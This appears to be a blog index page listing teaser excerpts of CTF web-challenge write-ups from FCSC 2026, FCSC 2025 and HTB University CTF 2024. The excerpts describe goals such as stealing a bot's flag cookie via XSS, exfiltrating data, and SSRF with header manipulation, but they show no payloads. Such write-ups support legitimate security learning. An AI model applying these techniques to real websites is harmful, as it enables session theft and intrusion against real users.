10 Fast Fishers [EN]| FCSC 2026

April 11, 2026 - 3 mins read

10 Fast Fishers | FCSC 2026 Challenge Think you can type fast? Prove it in 10 Fast Fishers, the addictive underwater typing game where speed meets style! A web typing game with a bot (Firefox 145 / Puppeteer) that visits a user-provided URL after setting a FLAG cookie on the game’s domain (httpOnly: false). The goal is to steal the cookie via XSS. Architecture App (port 5000): Static Express server hosting the game

Bubulle Corp [EN]| FCSC 2026

April 11, 2026 - 13 mins read

Bubulle Corp 1 & 2 | FCSC 2026 Introduction Bubulle Corp is a two-part web challenge from FCSC 2026. Both parts share the exact same source code: a three-service Docker setup with a Flask frontend, an Apache 2.4.66 reverse proxy, and a Flask/gunicorn 21.2.0 backend. There are two flags hidden in the infra. The first one is kind of a decoy, just a plain flag.txt file sitting on the Apache proxy, served by an AliasMatch rule.

Deep Blue [EN]| FCSC 2026

April 11, 2026 - 15 mins read

Deep Blue | FCSC 2026 Challenge Discover this new marine life blog! Can you steal the author’s secret fish & chips recipe? Dockerized web app serving an Angular blog about sea creatures. A Puppeteer bot sets an httpOnly FLAG cookie on the app’s domain, then visits a user-supplied URL. Every console.log from the bot’s browser gets forwarded back through the TCP connection. The goal is to trigger XSS in the bot’s browser, use it to fetch the protected secret recipe endpoint (which needs the bot’s cookie), and exfiltrate the flag.

FCSC Aquarium [EN]| FCSC 2026

April 11, 2026 - 3 mins read

FCSC Aquarium | FCSC 2026 Challenge The challenge gives us the full source of a Dockerized Node.js web app that serves an animated aquarium page. There is a SUID binary /getflag that reads the flag from /root/flag.txt. Goal is obvious. Looking at the source Two services run inside the container via supervisord. The web app (server.mjs) is started with the Node.js permission model: node --permission --allow-fs-read=/ /usr/app/server.mjs The second one is a messages service (messages.

Secure Mood Notes [EN]| FCSC 2026

April 11, 2026 - 22 mins read

Secure Mood Notes | FCSC 2026 Challenge Secure Mood Notes is a secure note-taking application. Each note can be filtered according to your mood: angry, chill, or normal. Share your notes with your friends in complete security! I was given the full source of a Docker application composed of two services: a Symfony 8 PHP app served by Apache with mod_php and the Snuffleupagus security extension, and a Flask microservice handling note sharing.

Shellfish Say [EN]| FCSC 2026

April 11, 2026 - 4 mins read

Shellfish Say | FCSC 2026 Challenge The new version of Shrimp Say is out! Discover Shellfish Say! To ask the bot to say something, connect with: nc challenges.fcsc.fr 2256 Note: The challenge VM has no internet access. We get the full source of a Docker stack. There is a PHP/Apache web app where a cartoon shellfish “says” a quote loaded via AJAX, and a Puppeteer bot that sets a FLAG cookie on the shellfish-say domain then visits a URL we provide.

Shrimp Saver [EN]| FCSC 2026

April 11, 2026 - 5 mins read

xss

Shrimp Saver | FCSC 2026 Challenge Rien de mieux qu’un petit ecran de veille a base de crustaces pour egayer son poste de travail ! I was given the full source of a Docker stack: Web app, PHP/Apache serving a bouncing-shrimp screensaver page with a nonce-based CSP. Bot, a Puppeteer (headless Chromium 146) service that sets an httpOnly cookie flag_auth on the challenge domain, then visits a user-supplied URL. Every console.

Nextruction [EN]| FCSC 2025

April 26, 2025 - 10 mins read

nextjs
ssrf

Under Nextruction Challenge Writeup Introduction In this challenge, we are exploring a Next.js web application, with a focus on exploitation using SSRF (Server-Side Request Forgery) and header manipulation: Main Application: https://under-nextruction.fcsc.fr:2213 The application features a separate service that stores a flag, which we need to retrieve: services: under-nextruction-app: build: ./src/nextjs ports: - "8000:8000" environment: - FLAG_STORE_KEY=FAKE_KEY - JWT_SECRET=FAKE_SECRET restart: unless-stopped under-nextruction-flag: build: ./src/flag-store environment: - FLAG_STORE_KEY=FAKE_KEY - FLAG=FCSC{flag_placeholder} restart: unless-stopped Understanding the Flag Service The flag service, written in Flask, returns a flag when the correct X-Key header is presented at the /get_flag endpoint:

Shrimp-Say [EN]| FCSC 2025

April 26, 2025 - 3 mins read

XSS

Introduction The challenge presents us with a web application called “shrimp-say” and a bot service to interact with: Application Web: https://shrimp-say.fcsc.fr/ Bot: nc chall.fcsc.fr 2203 (No internet access) The web application allows users to manipulate two parameters, msg and bg, in its URL: https://shrimp-say.fcsc.fr/?msg=Hello%20Shrimp&bg=lightblue These are reflected on the page: <style> body { background-color: lightblue; } ... </style> ... <div class="speech-bubble">Hello Shrimp</div> Parameters Analysis msg: This parameter undergoes filtering to prevent the inclusion of the < character, which could be used for HTML content injection.

EncoDecept [EN] | HTB University CTF 2024

December 15, 2024 - 18 mins read

web

Introduction This challenge is one of the 4 challenges in the WEB category published at the University CTF 2024. It is rated medium despite having the lowest resolution in the category. It is therefore considered the hardest web challenge of this edition. Description The Frontier Board’s iron grip on the galaxy rests on one secret: the location of the legendary Starry Spur, hidden deep within their Intergalactic Contract System (ICMS. With rebellion brewing, Jack Colt is humanity’s last hope.